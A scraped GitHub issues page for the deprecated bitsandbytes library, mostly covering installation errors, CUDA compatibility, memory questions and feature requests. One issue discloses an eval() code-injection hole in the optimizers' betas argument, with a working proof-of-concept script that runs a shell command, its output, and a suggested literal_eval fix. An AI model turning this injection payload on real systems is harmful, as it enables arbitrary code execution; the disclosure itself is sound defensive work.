This repository is no longer supported. Please use the new bitsandbytes here: https://github.com/TimDettmers/bitsandbytes.
You can install the new bitsandbytes version via:
pip install bitsandbytes
Library for 8-bit optimizers and quantization routines.
License: MIT License
import bitsandbytes as bnb
the following error appears:
OSError: /home/anaconda3/envs/ner/lib/python3.6/site-packages/bitsandbytes/libbitsandbytes.so: undefined symbol: __fatbinwrap_38_cuda_device_runtime_compute_75_cpp1_ii_8b1a5d37
Hello, how can I solve this?
Hey @TimDettmers,
Awesome library! bnb.optim.Adam saved me from having to use model parallelism 😍
Do you think it would be easy to also add a bnb.optim.AdamW version for https://pytorch.org/docs/stable/generated/torch.optim.AdamW.html#torch.optim.AdamW?
Happy to give it a try if you think it's easily feasible :-)
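For what it's worth, here is a rough sketch of what such a wrapper might look like, mirroring how bnb.optim.Adam builds on Optimizer2State. This is not the library's actual API; the argument names and whether the underlying kernel applies weight decay in the decoupled AdamW fashion would need to be checked.

from bitsandbytes.optim.optimizer import Optimizer2State

class AdamW8bit(Optimizer2State):
    """Hypothetical AdamW-style wrapper; 'adam' selects the underlying Adam update."""
    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=1e-2):
        # optim_bits=8 requests 8-bit optimizer state; weight_decay is simply forwarded,
        # so decoupled-decay semantics are an assumption here, not a guarantee
        super().__init__('adam', params, lr=lr, betas=betas, eps=eps,
                         weight_decay=weight_decay, optim_bits=8)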
The Optimizer2State class accepts strings in the optional betas parameter during initialization. The string value is passed to eval() without prior validation, potentially leading to execution of arbitrary code.
bitsandbytes/bitsandbytes/optim/optimizer.py
Lines 235 to 246 in 22b2877
bnb.optim.Adam, bnb.optim.Adam8bit and bnb.optim.Adam32bit exhibit the same behaviour.
#!/usr/bin/env python3
hello = "exec(\"import os;os.system('/usr/bin/id');\")"

try:
    from bitsandbytes.optim.optimizer import Optimizer2State
    Optimizer2State('test', 'test', betas=hello)
except:
    pass

try:
    import bitsandbytes as bnb
    bnb.optim.Adam('test', betas=hello)
except:
    pass

try:
    import bitsandbytes as bnb
    bnb.optim.Adam8bit('test', betas=hello)
except:
    pass

try:
    import bitsandbytes as bnb
    bnb.optim.Adam32bit('test', betas=hello)
except:
    pass
$ id
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
$ ./test.py
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
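As a suggested fix (not the library's current code), a safer pattern for accepting betas as a string is ast.literal_eval, which only parses Python literals and rejects arbitrary expressions:

import ast

def parse_betas(betas):
    # accept either a tuple/list or a string like "(0.9, 0.995)"
    if isinstance(betas, str):
        betas = ast.literal_eval(betas.strip())  # raises ValueError on non-literal input
    betas = tuple(float(b) for b in betas)
    if len(betas) != 2 or not all(0.0 <= b < 1.0 for b in betas):
        raise ValueError(f'invalid betas: {betas}')
    return betas

parse_betas('(0.9, 0.995)')                          # -> (0.9, 0.995)
parse_betas("exec(\"import os;os.system('id')\")")   # -> raises ValueError instead of executing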
The following tests fail on Pascal:
tests/test_functional.py::test_estimate_quantiles[float] FAILED
tests/test_functional.py::test_estimate_quantiles[half] FAILED
tests/test_functional.py::test_quantile_quantization FAILED
My guess is that this is probably due to atomicAdd for floats working differently.
There's a quantization example here. It shows that there is a bnb.functional.quantize_fp4(x), but I couldn't find it in the documentation.
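For what it's worth, quantize_fp4 belongs to the newer, maintained bitsandbytes repo rather than this one, and as far as I can tell it returns the packed tensor together with a quantization state that dequantize_fp4 consumes. A rough round-trip sketch under that assumption (requires a CUDA tensor):

import torch
import bitsandbytes as bnb

x = torch.randn(1024, 1024, device='cuda', dtype=torch.float16)

# assumption: quantize_fp4 returns (packed 4-bit data, quant_state)
x_fp4, quant_state = bnb.functional.quantize_fp4(x)

# assumption: dequantize_fp4 reverses the packing using the saved state
x_deq = bnb.functional.dequantize_fp4(x_fp4, quant_state)

print((x - x_deq).abs().mean())  # small but nonzero quantization error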
In this line, instead of passing the sparse parameter, False is passed. Is this intended? It's a little confusing, since the default for sparse is True here but False in torch.nn.Embedding.
Replace embedding layer if necessary: torch.nn.Embedding(..) -> bnb.nn.Embedding(..)
Does this assume the user creates custom classes to replace (for example) Hugging Face Transformers' GPT2DoubleHeadsModel? Or is there something like bnb.optim.GlobalOptimManager that changes a provided model instance to use bitsandbytes embeddings instead of torch ones?
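As far as I know there is no built-in converter; the usual approach is to walk the model and swap embedding modules in place. A rough sketch, assuming bnb.nn.StableEmbedding accepts the standard nn.Embedding constructor arguments (note that StableEmbedding adds a layer norm, so outputs won't be bit-identical to the original embedding):

import torch.nn as nn
import bitsandbytes as bnb

def replace_embeddings(model: nn.Module) -> nn.Module:
    # recursively swap nn.Embedding modules for the bitsandbytes version in place
    for name, module in model.named_children():
        if isinstance(module, nn.Embedding):
            new = bnb.nn.StableEmbedding(module.num_embeddings, module.embedding_dim,
                                         padding_idx=module.padding_idx)
            new.weight.data.copy_(module.weight.data)  # keep the pretrained weights
            setattr(model, name, new)
        else:
            replace_embeddings(module)
    return model

# hypothetical usage with a Hugging Face model:
# model = replace_embeddings(GPT2DoubleHeadsModel.from_pretrained('gpt2'))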
Thank you for the nice project.
When I use the AdamW8bit optimizer, I can save GPU memory. However, when I combine the optimizer with OSS in fairscale, GPU memory is not reduced.
Is this library not compatible with OSS in fairscale, or is it another issue?
Great work!
Could you please add an implementation of the NovoGrad algorithm?
Support info:
paper: https://arxiv.org/abs/1905.11286
Novograd implementations:
https://github.com/NVIDIA/apex/blob/master/apex/optimizers/fused_novograd.py
https://github.com/jettify/pytorch-optimizer/blob/master/torch_optimizer/novograd.py
https://github.com/convergence-lab/novograd
https://github.com/lonePatient/NovoGrad-pytorch
https://github.com/titu1994/keras_novograd
Using the bnb.optim.Adam8bit optimizer in place of torch.optim.Adam causes a crash after a handful of batches:
12it [00:22, 1.82s/it]Error an illegal memory access was encountered at line 198 in file /home/alyssa/gpt_math/bitsandbytes/csrc/ops.cu
I am fine-tuning Hugging Face's version of the gpt2-large model on an Ampere 3090 GPU with CUDA version 11.6 and NVIDIA driver version 510.73.05. I have tried compiling bitsandbytes on my machine from source, and the set_optim_to_run_embedding_in_fp32 trick from huggingface/transformers#14819; neither of them affected the behavior. Running with the standard PyTorch Adam optimizer works fine. nvidia-smi shows 16 GB of memory used on a GPU with 24 GB, so it shouldn't be running out of RAM or anywhere close to that.
I am trying to train GPT-J with 8-bit weights. It works well on GPU, but when I try to use it on CPU, it gives this error:
'NoneType' object has no attribute 'cdequantize_blockwise_cpu_fp32'
I have used dequantize_blockwise from bitsandbytes.functional. Following is the class in which it's used:
import torch
import torch.nn.functional as F
from bitsandbytes.functional import dequantize_blockwise

class DequantizeAndLinear(torch.autograd.Function):
    @staticmethod
    def forward(ctx, input: torch.Tensor, weights_quantized: torch.ByteTensor,
                absmax: torch.FloatTensor, code: torch.FloatTensor, bias: torch.FloatTensor):
        # dequantize the 8-bit weights back to floating point for the forward matmul
        weights_deq = dequantize_blockwise(weights_quantized, absmax=absmax, code=code)
        ctx.save_for_backward(input, weights_quantized, absmax, code)
        ctx._has_bias = bias is not None
        return F.linear(input, weights_deq, bias)

    @staticmethod
    def backward(ctx, grad_output: torch.Tensor):
        # gradients are only needed w.r.t. the input (and bias), not the quantized weights
        assert not ctx.needs_input_grad[1] and not ctx.needs_input_grad[2] and not ctx.needs_input_grad[3]
        input, weights_quantized, absmax, code = ctx.saved_tensors
        # grad_output: [*batch, out_features]
        weights_deq = dequantize_blockwise(weights_quantized, absmax=absmax, code=code)
        grad_input = grad_output @ weights_deq
        grad_bias = grad_output.flatten(0, -2).sum(dim=0) if ctx._has_bias else None
        return grad_input, None, None, None, grad_bias
Is it possible to run it on CPU, or do I have to run it only on GPU?
I get OSError: [WinError 193] %1 is not a valid Win32 application from lib = ct.cdll.LoadLibrary(os.path.dirname(__file__) + '/libbitsandbytes.so') in functional.py. What am I doing wrong?
First of all, great work!
Secondly, I can see that you specify that Maxwell architecture is necessary, and I am wondering if older architectures could be supported as well.
I ask because Kaggle and Colab notebooks use older Tesla-series GPUs (P100, K80), and I'm sure those communities, myself included, would be interested in using bitsandbytes.
Hi,
Thanks for the great work! I'm currently trying to apply your code to vision transformers, specifically, on this code base:
https://github.com/facebookresearch/SlowFast/tree/main/projects/mvit
When using torch.optim.SGD(momentum=0.9), the code consumes 9221 MiB of GPU memory during training. After changing it to bnb.optim.SGD8bit() with the same arguments, it consumes even slightly more: 9235 MiB. Do you have any idea why this would happen? Thank you! My CUDA version is 10.2 and torch version is 1.9.1.
Best,
Junwei
(torch1.8-py3.8) jiaofangkai@dell-PowerEdge-T640:/home/share/jiaofangkai$ python check_bnb_install.py
Traceback (most recent call last):
File "check_bnb_install.py", line 1, in <module>
import bitsandbytes as bnb
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/__init__.py", line 5, in <module>
from .optim import adam
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/optim/__init__.py", line 5, in <module>
from .adam import Adam, Adam8bit, Adam32bit
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/optim/adam.py", line 6, in <module>
from bitsandbytes.optim.optimizer import Optimizer2State
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/optim/optimizer.py", line 6, in <module>
import bitsandbytes.functional as F
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/functional.py", line 13, in <module>
lib = ct.cdll.LoadLibrary(os.path.dirname(__file__) + '/libbitsandbytes.so')
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/ctypes/__init__.py", line 459, in LoadLibrary
return self._dlltype(name)
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/ctypes/__init__.py", line 381, in __init__
self._handle = _dlopen(self._name, mode)
OSError: /home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/libbitsandbytes.so: undefined symbol: __fatbinwrap_38_cuda_device_runtime_compute_75_cpp1_ii_8b1a5d37
Hi, I have encountered issues similar to #5. I have tested with a Tesla T4 and an RTX 2080 Ti, but both failed.
The environments are as follows:
# Tesla T4
Ubuntu 18.04.6, Tesla T4, cuda-10.1, driver version: 418.197.02, python=3.8, torch=1.8.1+cu101
# RTX 2080Ti
Ubuntu 20.04.3, RTX 2080Ti, cuda-10.1, driver version: 435.21, python=3.8, torch=1.8.1+cu101
(bitsandbytes) chenxin@chenxin-Nitro-AN515-52:/disk1/github/bitsandbytes$ python setup.py install
Traceback (most recent call last):
  File "setup.py", line 15, in <module>
    name = f"bitsandbytes-cuda{os.environ['CUDA_VERSION']}",
  File "/home/chenxin/disk1/anaconda3/envs/bitsandbytes/lib/python3.8/os.py", line 675, in __getitem__
    raise KeyError(key) from None
KeyError: 'CUDA_VERSION'
(bitsandbytes) chenxin@chenxin-Nitro-AN515-52:/disk1/github/bitsandbytes$ conda list | grep cudatoolkit
cudatoolkit 11.1.1 h6406543_8 conda-forge
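For reference, the setup.py line in the traceback reads os.environ['CUDA_VERSION'] to build the package name (e.g. bitsandbytes-cuda111), so the install likely needs that variable set to match the installed toolkit. Given the cudatoolkit 11.1 shown above, something like the following should work (the exact version string is an assumption):

CUDA_VERSION=111 python setup.py install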
THCudaCheck FAIL file=/pytorch/aten/src/THC/generic/THCTensorMath.cu line=29 error=1 : invalid argument
Traceback (most recent call last):
File "train_pointunet.py", line 211, in <module>
loss_seg = lossfunc_seg(outputs_seg, labels)+lossfunc_dice(outputs_seg,labels)
File "/home/why/miniconda3/envs/3.6.8/lib/python3.6/site-packages/torch/tensor.py", line 245, in backward
torch.autograd.backward(self, gradient, retain_graph, create_graph, inputs=inputs)
File "/home/why/miniconda3/envs/3.6.8/lib/python3.6/site-packages/torch/autograd/__init__.py", line 147, in backward
allow_unreachable=True, accumulate_grad=True) # allow_unreachable flag
RuntimeError: cuda runtime error (1) : invalid argument at /pytorch/aten/src/THC/generic/THCTensorMath.cu:29
I'm very confused because it works fine for the first several epochs.
With some CUDA versions and on some architectures this error occurs:
Traceback (most recent call last):
File "check_bnb_install.py", line 1, in <module>
import bitsandbytes as bnb
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/__init__.py", line 5, in <module>
from .optim import adam
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/optim/__init__.py", line 5, in <module>
from .adam import Adam, Adam8bit, Adam32bit
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/optim/adam.py", line 5, in <module>
from bitsandbytes.optim.optimizer import Optimizer2State
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/optim/optimizer.py", line 6, in <module>
import bitsandbytes.functional as F
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/functional.py", line 13, in <module>
lib = ct.cdll.LoadLibrary(os.path.dirname(__file__) + '/libbitsandbytes.so')
File "/miniconda/envs/pytorch_env/lib/python3.7/ctypes/__init__.py", line 442, in LoadLibrary
return self._dlltype(name)
File "/miniconda/envs/pytorch_env/lib/python3.7/ctypes/__init__.py", line 364, in __init__
self._handle = _dlopen(self._name, mode)
OSError: /miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/libbitsandbytes.so: undefined symbol: __fatbinwrap_38_cuda_device_runtime_compute_75_cpp1_ii_8b1a5d37
Confirmed for CUDA 10.1 for compute capability 7.5 (V100).
New Model out. Any chance it'll be supported by you guys?
OSError: We couldn't connect to 'https://huggingface.co' to load this file, couldn't find it in the cached files and it looks like decapoda-research/llama-7b-hf is not the path to a directory containing a file named config.json.
Checkout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.
Are there any plans to support models/grads with the bfloat16 type? Bfloat16 has gained quite a lot of popularity lately, as every Ampere GPU supports the type, and it eliminates the need for loss scaling compared to float16.
This is what I get when I try to initialize bnb.AdamW with a model cast to bfloat16:
ValueError: Gradient+optimizer bit data type combination not supported: grad torch.bfloat16, optimizer torch.uint8
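Until bf16 optimizer states are supported, one way to sidestep the error might be to keep the parameters (and therefore the gradients) in fp32 and restrict bfloat16 to the forward/backward compute via autocast. A rough sketch (MyModel and loader are placeholders, not part of the library):

import torch
import bitsandbytes as bnb

model = MyModel().cuda()                      # placeholder model; parameters stay fp32
optimizer = bnb.optim.Adam8bit(model.parameters(), lr=1e-4)

for batch, target in loader:                  # placeholder data loader
    optimizer.zero_grad()
    # bfloat16 is used only inside autocast; params and grads remain fp32 for the optimizer
    with torch.autocast(device_type='cuda', dtype=torch.bfloat16):
        loss = torch.nn.functional.cross_entropy(model(batch.cuda()), target.cuda())
    loss.backward()
    optimizer.step()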
As reported in the paper, for training a bi-directional transformer model on WMT14 or WMT16 the performance of 8-bit Adam stays relatively consistent with the 32-bit counterparts. I was also able to verify this on other data sources for training bi-directional models with my own setup.
However, I've also tried multiple variations of 8-bit optimizers on multilingual neural machine translation (MNMT) models in fairseq, and there it seems that even with --no-scale-embedding as well as the StableEmbedding, the performance is roughly 3 BLEU behind the counterparts. The --no-scale-embedding flag amounts to roughly a 7 BLEU gain, while the Xavier init amounts to roughly a 0.4 BLEU gain. I didn't look into the effect of the layer norm of the stable embeddings yet.
Did you do any testing on that and have practical tips on getting the performance up?
Hi.
I am training my network with bnb.optim.Adam8bit vs torch.optim.Adam, but I don't see any difference in memory consumption.
Running on an RTX 2080 Ti (single GPU or DDP), with cudatoolkit 11.1.74 and bitsandbytes-cuda111.
Looking at nvidia-smi, I see 9.6 GB in both cases.
Am I missing something here?
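One thing worth checking: nvidia-smi includes the CUDA context and PyTorch's caching allocator, so optimizer-state savings are easy to miss there, and the state buffers are only allocated on the first step. A minimal sketch for comparing allocated memory directly (uses a stand-in Linear layer; substitute your own model):

import torch
import bitsandbytes as bnb

def peak_mib_after_one_step(optimizer_cls):
    torch.cuda.empty_cache()
    torch.cuda.reset_peak_memory_stats()
    model = torch.nn.Linear(4096, 4096).cuda()           # stand-in model
    opt = optimizer_cls(model.parameters(), lr=1e-3)
    model(torch.randn(64, 4096, device='cuda')).sum().backward()
    opt.step()                                            # optimizer state is allocated here
    return torch.cuda.max_memory_allocated() / 2**20

print('torch.optim.Adam   :', peak_mib_after_one_step(torch.optim.Adam), 'MiB')
print('bnb.optim.Adam8bit :', peak_mib_after_one_step(bnb.optim.Adam8bit), 'MiB')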